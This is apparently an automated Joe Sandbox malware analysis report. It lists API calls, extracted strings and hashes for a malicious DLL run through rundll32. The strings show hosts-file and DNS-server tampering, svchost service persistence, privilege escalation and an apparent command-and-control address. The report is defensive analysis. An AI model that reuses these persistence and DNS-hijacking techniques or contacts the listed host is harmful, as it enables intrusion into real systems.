                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 854aff89b505d9f21911f8c1ba55fbf1c8cc102515e225042a2c32485127d58f
                                                • Instruction ID: 6451e9acda46e7ae8c67071bb3abdc211bd966f3bbc7d4a56457b69d03684d62
                                                • Opcode Fuzzy Hash: 854aff89b505d9f21911f8c1ba55fbf1c8cc102515e225042a2c32485127d58f
                                                • Instruction Fuzzy Hash: B2B092B09016248BEB12CF608C8844B3764A30C2413448405F920C3228E734C008DB10
                                                APIs
                                                • LoadLibraryA.KERNEL32(033F7070), ref: 100016C6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f0908b3c00027b1b6766c7a861152c97f68057995d64c84cdc6b6950141695e5
                                                • Instruction ID: f44bec48cfd1db76282749f53c4335c8f231482f3a8341f8f54339fd7f20c475
                                                • Opcode Fuzzy Hash: f0908b3c00027b1b6766c7a861152c97f68057995d64c84cdc6b6950141695e5
                                                • Instruction Fuzzy Hash: 5EB092B4800620DBEA228F608CC840736A4A30C241310C801F910C3224D734C004DB60
                                                APIs
                                                • LoadLibraryA.KERNEL32(033F5060), ref: 10001726
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: ab9ae1063b3321a9dca9df484140cc1d72058cb032d66644504e5a3d9c28704e
                                                • Instruction ID: 01a5768d41d78c628a35912e35f35776f9a67f167c5283b5b972b0fbab8e5750
                                                • Opcode Fuzzy Hash: ab9ae1063b3321a9dca9df484140cc1d72058cb032d66644504e5a3d9c28704e
                                                • Instruction Fuzzy Hash: A1B092B88005208BE612CB60898840B3675A30C2813008101FA10C3224E734C0009B20
                                                APIs
                                                • RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,74DF0F00), ref: 10004C65
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: ab5e289189027fa5173076accd2a09c4160f3ba94fff289705bc0327fdc0764d
                                                • Instruction ID: 915426f7239b9cb48ebf138ba431655957d97aef7f5178b11ca68321cf6e6836
                                                • Opcode Fuzzy Hash: ab5e289189027fa5173076accd2a09c4160f3ba94fff289705bc0327fdc0764d
                                                • Instruction Fuzzy Hash: C1A00275904610AFDE40DBE4DA8C81A77F8AB85712B00C845F146C3510D634D840DB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: gethostbyname
                                                • String ID:
                                                • API String ID: 930432418-0
                                                • Opcode ID: 50365e01bdaa580be6bb6383309374887bc137a38b4d224bf2d268161eb1372f
                                                • Instruction ID: 26478d519f0170d2f3c1910e6c0f6e08a92a4de9d16a5e5f2b495c288a005660
                                                • Opcode Fuzzy Hash: 50365e01bdaa580be6bb6383309374887bc137a38b4d224bf2d268161eb1372f
                                                • Instruction Fuzzy Hash: 1EA00275908214ABDE00DBA5CA8C81E77E8BF85701B00C844F145C2110CA34D844DB51
                                                APIs
                                                • PathFileExistsA.SHLWAPI(?,1000BB9A,c:\agtve\ReadMe.txt,SeDebugPrivilege,00000001), ref: 10004A15
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID:
                                                • API String ID: 1174141254-0
                                                • Opcode ID: a2ead1cd667fb061e5310f991c7bc1f390f2f87bae4bb2e0e60ae8b5a9b1b8f4
                                                • Instruction ID: ec750d28cb6fbb977bf46ecf5412cbf52607359abee085474d97c5188552acf2
                                                • Opcode Fuzzy Hash: a2ead1cd667fb061e5310f991c7bc1f390f2f87bae4bb2e0e60ae8b5a9b1b8f4
                                                • Instruction Fuzzy Hash: F4A00275904210AFDF00DBF4CA8C81A77E8ABC5701B00C844F145C3110D674D850DB11
                                                APIs
                                                • GetDriveTypeA.KERNEL32(10019D30,1000B666,10019D30), ref: 10004B35
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DriveType
                                                • String ID:
                                                • API String ID: 338552980-0
                                                • Opcode ID: 7196cfdbc03724b64f0cbb3baeb96423ea548a19a07590a7764bab302cc12c8f
                                                • Instruction ID: 9c3019adaafa634595d2db0f921d36bac7b56a2a79f4b30dc892680141a0bc5c
                                                • Opcode Fuzzy Hash: 7196cfdbc03724b64f0cbb3baeb96423ea548a19a07590a7764bab302cc12c8f
                                                • Instruction Fuzzy Hash: 74A002B5A04210ABDE00EBA5CB8C91A77FCAB89701B008845F549C2011C678DC40DB11
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 100217ED
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 1b9a90a861be483b221b99874f8e2b3b106077afceec4b8f99b5110b6b4da362
                                                • Instruction ID: 2c76a93c93dfa73a3cc5bc0969654cda5b929ba325a9910453c2048308b3be31
                                                • Opcode Fuzzy Hash: 1b9a90a861be483b221b99874f8e2b3b106077afceec4b8f99b5110b6b4da362
                                                • Instruction Fuzzy Hash: D9016D35E843289FDB61CF28CC087C8B7F1EB44351F6100A8E688B7285D7B5AE818E44
                                                APIs
                                                • strrchr.MSVCRT ref: 1000610E
                                                • strncpy.MSVCRT ref: 10006125
                                                • strncpy.MSVCRT ref: 1000612F
                                                • GetSystemInfo.KERNEL32(?), ref: 10006139
                                                • GetCurrentProcess.KERNEL32(00000020,?), ref: 1000615A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 10006161
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 10006172
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 100061A7
                                                • CloseHandle.KERNEL32(00000010), ref: 100061B2
                                                • sscanf.MSVCRT ref: 100061DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
                                                • String ID: %[^$SeDebugPrivilege$c:\agtve$etc\hosts
                                                • API String ID: 3677170833-1810064220
                                                • Opcode ID: 1d3e106431755b1c910628fea7e204a29dca4c5e9b862ff13ab7f723e560162f
                                                • Instruction ID: 40014daf93b6d2639d90dc8878842a3feb4d3ad8defe4510b3edf01b2d76c729
                                                • Opcode Fuzzy Hash: 1d3e106431755b1c910628fea7e204a29dca4c5e9b862ff13ab7f723e560162f
                                                • Instruction Fuzzy Hash: 403156B5904360AFE310DF65CDC9A6BBBE8FF8A310F40851AF645866A1D7B4D580CB62
                                                APIs
                                                • wcscat.MSVCRT ref: 10005B73
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 10005E38
                                                • _strcmpi.MSVCRT ref: 10005E55
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 10005F59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DecrementInterlocked$_strcmpiwcscat
                                                • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                • API String ID: 1133782235-2685825574
                                                • Opcode ID: 0ce223196c44f2370e13e00feec4bfde119dc900f9d0c8cd7ae9a200d1607e84
                                                • Instruction ID: 0bcee575146c1e5c4bc0c3f0e2efc98e3102ad08c7b031823cab273adbecfb8d
                                                • Opcode Fuzzy Hash: 0ce223196c44f2370e13e00feec4bfde119dc900f9d0c8cd7ae9a200d1607e84
                                                • Instruction Fuzzy Hash: F502C4715043469FE720DF64C884AAFB7E9FB88394F008A2DF5999B280DB75DD81CB52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DecrementInterlocked
                                                • String ID: WHERE $DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$ROOT\CIMV2$SELECT * FROM $SetDNSServerSearchOrder$SetGateways$WQL$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
                                                • API String ID: 3448037634-1913130381
                                                • Opcode ID: 51b101c3c0528bff3dc3a5a8d8054af0c5bfe4afcaa312b89b4ad1427c49d158
                                                • Instruction ID: 422aa8304ea0dd682b4161e69f4c579d617248279d3008b81ee9107976b9911b
                                                • Opcode Fuzzy Hash: 51b101c3c0528bff3dc3a5a8d8054af0c5bfe4afcaa312b89b4ad1427c49d158
                                                • Instruction Fuzzy Hash: 02427F706083819FE364CB68C881B6BBBE4FF85384F10492DF599D7295DB70E949CB52
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Versionsprintf
                                                • String ID: 2000$2003$2008$Vista$Win %s SP%d
                                                • API String ID: 1728264858-2264339393
                                                • Opcode ID: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
                                                • Instruction ID: 2420705a5d847b29da7bc657143dca2d79446832891e12a74f3d8b2563089a91
                                                • Opcode Fuzzy Hash: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
                                                • Instruction Fuzzy Hash: 7531E6357043445BF724C524C850AABB7D7F7C9360FA18B2EE95ACB384DA74DD098652
                                                APIs
                                                • FindFirstFileA.KERNEL32(?,?), ref: 10005333
                                                • wsprintfA.USER32 ref: 1000537B
                                                • FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 100053E8
                                                • FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 100053FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID: %s\%s$.$\*.*
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: /$T$U
                                                APIs
                                                • GetLocalTime.KERNEL32(?,?), ref: 100100D5
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 100100E5
                                                  • Part of subcall function 1000F800: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?), ref: 1000F80D
                                                  • Part of subcall function 1000F7D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000F7EC
                                                Similarity
                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: K$P
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: K$PTU
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,1000718E), ref: 10004BAE
                                                Similarity
                                                • API ID: AdjustPrivilegesToken
                                                • String ID:
                                                APIs
                                                • ExitWindowsEx.USER32(?,00000000), ref: 100049FA
                                                Similarity
                                                • API ID: ExitWindows
                                                • String ID:
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: bad d_code
                                                APIs
                                                Strings
                                                • c:\windows\system32\drivers\%s\%s, xrefs: 10006447
                                                • %s\%s, xrefs: 100063BB
                                                • c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 1000651F
                                                • c:\windows\system32\drivers\%s, xrefs: 1000642E
                                                Similarity
                                                • API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
                                                • String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
                                                APIs
                                                • wsprintfA.USER32 ref: 1000826D
                                                • lstrlen.KERNEL32(?), ref: 1000828C
                                                • wsprintfA.USER32 ref: 100082C3
                                                • _CxxThrowException.MSVCRT ref: 100082F2
                                                • SetLastError.KERNEL32(00000000), ref: 1000831C
                                                • _CxxThrowException.MSVCRT(?), ref: 10008336
                                                • RegCloseKey.ADVAPI32(?), ref: 1000833F
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 10008391
                                                • _CxxThrowException.MSVCRT(?,100147E8), ref: 100083AB
                                                • SetLastError.KERNEL32(00000000,?,00000000,00000007), ref: 100083CE
                                                • _CxxThrowException.MSVCRT(?,100147E8), ref: 100083E8
                                                • GetLastError.KERNEL32(?,100147E8,?,00000000,00000007), ref: 100083F9
                                                Strings
                                                • Description, xrefs: 1000829B
                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 1000835A
                                                • ServiceDll, xrefs: 1000830D
                                                • RegSetValueEx(Svchost\krnlsrvc), xrefs: 100083E1
                                                • RegOpenKeyEx(Svchost), xrefs: 100083A4
                                                • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 100082BD
                                                • RegSetValueEx(ServiceDll), xrefs: 1000832F
                                                • SYSTEM\CurrentControlSet\Services\%s, xrefs: 10008267
                                                Similarity
                                                • API ID: ExceptionThrow$ErrorLast$wsprintf$CloseOpenlstrlen
                                                • String ID: Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                APIs
                                                • wsprintfA.USER32 ref: 10006A7E
                                                • GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006A95
                                                • GetModuleFileNameA.KERNEL32(10000000,c:\agtve\yhnvs.dll,00000104), ref: 10006AA7
                                                • strrchr.MSVCRT ref: 10006AD5
                                                • wsprintfA.USER32 ref: 10006AED
                                                • wsprintfA.USER32 ref: 10006AFE
                                                • wsprintfA.USER32 ref: 10006B0F
                                                Strings
                                                Similarity
                                                • API ID: wsprintf$FileModuleName$strrchr
                                                • String ID: %s.txt$%s\ReadMe.txt$%s\version.txt$09121307$09121307.txt$ECF4BBEA1588$M%s$Mkrnaver.com:6520$c:\agtve$c:\agtve\ReadMe.txt$c:\agtve\version.txt$c:\agtve\yhnvs.dll$c:\windows\SysWOW64\rundll32.exe$krnaver.com:6520
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _mbsicmp
                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 10005069
                                                  • Part of subcall function 10004DA0: CreateFileA.KERNEL32(?,MZ@,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
                                                  • Part of subcall function 10004DA0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
                                                  • Part of subcall function 10004DA0: time.MSVCRT(00000000), ref: 10004E7F
                                                  • Part of subcall function 10004DA0: _localtime32.MSVCRT(?), ref: 10004E8E
                                                  • Part of subcall function 10004DA0: strftime.MSVCRT ref: 10004EA1
                                                  • Part of subcall function 10004DA0: vsprintf.MSVCRT ref: 10004EF3
                                                  • Part of subcall function 10004DA0: sprintf.MSVCRT ref: 10004F13
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$CreateCurrentPointerProcess_localtime32sprintfstrftimetimevsprintf
                                                • String ID: %s.%d$C:\Windows\6C4DA6FB\svchsot.exe$C:\Windows\6C4DA6FB\svchsot.vir$cmd.exe$self
                                                • API String ID: 3192119092-4191049792
                                                • Opcode ID: ec2b08bf7f1156d9c8dcfe4d16c6df7a8508a6621eb8c1214a1196f4b0e722e6
                                                • Instruction ID: 7fa6494ac43d5dcc9c5c53410437834f8a30d40188a99b7aa6c5cd6ec2dc6e24
                                                • Opcode Fuzzy Hash: ec2b08bf7f1156d9c8dcfe4d16c6df7a8508a6621eb8c1214a1196f4b0e722e6
                                                • Instruction Fuzzy Hash: D8112BB26402147BF3119754EC8ABEA3348DF84362F414131F70496181DA76E5A8C6B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID: JS0yNHMgJS0xNXMgJXMgXHJcbg==$JS0yNHMgJS0xNXMgMHgleCglZCkgXHJcbg==$JS0yNHMgJS0xNXMgXHJcbg==$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                                • API String ID: 71445658-1435378120
                                                • Opcode ID: bd973036ceaf793e645ef01d76d6486dd3db76796ff37db88c669a367f4bbfe9
                                                • Instruction ID: 3f2a93cd4c3d7343f0a580605e2b8078640624975132d2b922564d29651d2999
                                                • Opcode Fuzzy Hash: bd973036ceaf793e645ef01d76d6486dd3db76796ff37db88c669a367f4bbfe9
                                                • Instruction Fuzzy Hash: 7CC1A8B6900158AFEB14CF94DC41FDFB3B9EB89350F004299F619A7184EB74AE84CB91
                                                APIs
                                                  • Part of subcall function 10006090: strrchr.MSVCRT ref: 1000610E
                                                  • Part of subcall function 10006090: strncpy.MSVCRT ref: 10006125
                                                  • Part of subcall function 10006090: strncpy.MSVCRT ref: 1000612F
                                                  • Part of subcall function 10006090: GetSystemInfo.KERNEL32(?), ref: 10006139
                                                  • Part of subcall function 10006090: GetCurrentProcess.KERNEL32(00000020,?), ref: 1000615A
                                                  • Part of subcall function 10006090: OpenProcessToken.ADVAPI32(00000000), ref: 10006161
                                                  • Part of subcall function 10006090: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 10006172
                                                  • Part of subcall function 10006090: AdjustTokenPrivileges.ADVAPI32 ref: 100061A7
                                                  • Part of subcall function 10006090: CloseHandle.KERNEL32(00000010), ref: 100061B2
                                                  • Part of subcall function 10006090: sscanf.MSVCRT ref: 100061DD
                                                • wsprintfA.USER32 ref: 10006752
                                                  • Part of subcall function 100061F0: strchr.MSVCRT ref: 10006246
                                                • wsprintfA.USER32 ref: 100067B8
                                                • wsprintfA.USER32 ref: 100067D1
                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 100067DC
                                                  • Part of subcall function 10005130: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,100094AF,?,?,?), ref: 10005149
                                                  • Part of subcall function 10005130: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000516B
                                                  • Part of subcall function 10005130: CloseHandle.KERNEL32(00000000), ref: 10005172
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 1000681A
                                                • CreateThread.KERNEL32(00000000,00000000,100065E0,00000000,00000000,00000000), ref: 10006841
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
